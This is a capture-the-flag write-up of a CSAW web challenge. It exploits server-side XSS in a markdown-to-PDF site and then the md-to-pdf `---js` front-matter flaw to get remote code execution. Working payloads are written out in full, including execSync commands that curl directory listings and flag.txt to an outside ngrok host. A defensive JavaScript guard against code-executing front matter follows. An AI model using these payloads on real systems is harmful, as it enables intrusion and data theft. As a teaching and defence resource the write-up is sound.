My Little Website

WEB | 54 pts - 406 solves

Description: I am new to programming and made this simple pdf creator website here, hopefully it is secure enough :)...

The challenge is a PDF-rendering website: we can inject markdown, and maybe JavaScript as well. First thing, check for XSS:

<script> document.write(window.location) </script>

OK, it's vulnerable. Strictly speaking this is server-side XSS: we aren't injecting code into a page served to other users (client-side); our script executes on the server side of the application, while the PDF is being rendered. Let's try something more interesting:

<script>document.write('<iframe src="/"></iframe>')</script>

We're inside the /chal directory of a Node.js webapp. index.js definitely looks interesting for us, so let's try to read it:

<script>
fetch('index.js')
  .then(response => response.text())
  .then(text => document.write(text))
</script>

That's a lot of info, but what matters most is the mdToPdf package: a quick search shows it is vulnerable to RCE through a JavaScript front-matter block (`---js`), which is exactly what we send next:

https://security.snyk.io/vuln/SNYK-JS-MDTOPDF-1657880

---js
require('child_process').execSync('ls -la > /tmp/tmp.txt && curl -d @/tmp/tmp.txt http://06f6-151-62-28-161.eu.ngrok.io')
---

No flag here, let's look one directory above:

---js
require('child_process').execSync('ls -la .. > /tmp/tmp.txt && curl -d @/tmp/tmp.txt http://06f6-151-62-28-161.eu.ngrok.io')
---

Here we go, read flag.txt:

---js
require('child_process').execSync('curl -d @../flag.txt http://06f6-151-62-28-161.eu.ngrok.io')
---

CTF{pdf_c0nt1nu3s_70_5uCK}

Challenge URL: http://web.chal.csaw.io:5013
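From the defender's side, the primitive behind those payloads is gray-matter's front-matter "language" hint (`---js`, `---javascript`), which routes the block to an engine that evaluates it. The real fix is upgrading md-to-pdf to the version the linked advisory names; the guard below is an added example, not code from the writeup or from md-to-pdf, that mirrors gray-matter's delimiter rules to reject user-supplied markdown whose front matter would reach a code-executing engine. The sample documents are constructed.

```javascript
// Added example (not from the writeup or md-to-pdf): inspect user-supplied
// markdown before it reaches a converter whose front-matter parser still
// has the gray-matter `js` engine enabled.
const OPEN = '---';
const CLOSE = '\n---';
// Engines that execute code; yaml/json/toml only deserialize data.
const CODE_ENGINES = new Set(['js', 'javascript', 'coffee', 'cson']);

// Mirrors gray-matter's delimiter handling: front matter must start at
// offset 0 (after an optional BOM), the language is whatever follows `---`
// on that first line (default yaml), and `----` is ordinary text.
// Returns { lang, matter, body } or null when there is no front matter.
function parseFrontMatter(md) {
  const text = md.replace(/^\uFEFF/, '').replace(/\r\n/g, '\n');
  if (!text.startsWith(OPEN) || text.charAt(OPEN.length) === '-') return null;
  const rest = text.slice(OPEN.length);
  const nl = rest.indexOf('\n');
  const lang = (nl === -1 ? rest : rest.slice(0, nl)).trim().toLowerCase() || 'yaml';
  const afterHeader = nl === -1 ? '' : rest.slice(nl);
  const closeAt = afterHeader.indexOf(CLOSE);
  if (closeAt === -1) return { lang, matter: afterHeader.slice(1), body: '' };
  const matter = afterHeader.slice(1, closeAt);            // drop the leading newline
  const body = afterHeader.slice(closeAt + CLOSE.length).replace(/^\n/, '');
  return { lang, matter, body };
}

// Policy decision for one submission. Returns { ok, reason }.
function checkMarkdown(md) {
  const fm = parseFrontMatter(md);
  if (fm === null) return { ok: true, reason: 'no front matter' };
  if (CODE_ENGINES.has(fm.lang)) {
    return { ok: false, reason: `front matter targets code-executing engine "${fm.lang}"` };
  }
  return { ok: true, reason: `front matter uses data-only engine "${fm.lang}"` };
}

// Constructed samples: the shape of the payload above, a benign document,
// and plain markdown with no front matter at all.
const SAMPLES = {
  rce:    "---js\nrequire('child_process')\n---\n# report",
  benign: "---\ntitle: Quarterly report\n---\n# report",
  plain:  "# report\n\nNo front matter at all.",
};

for (const [name, md] of Object.entries(SAMPLES)) {
  const v = checkMarkdown(md);
  console.log(`${name.padEnd(6)} ${v.ok ? 'ALLOW ' : 'REJECT'}  ${v.reason}`);
}
```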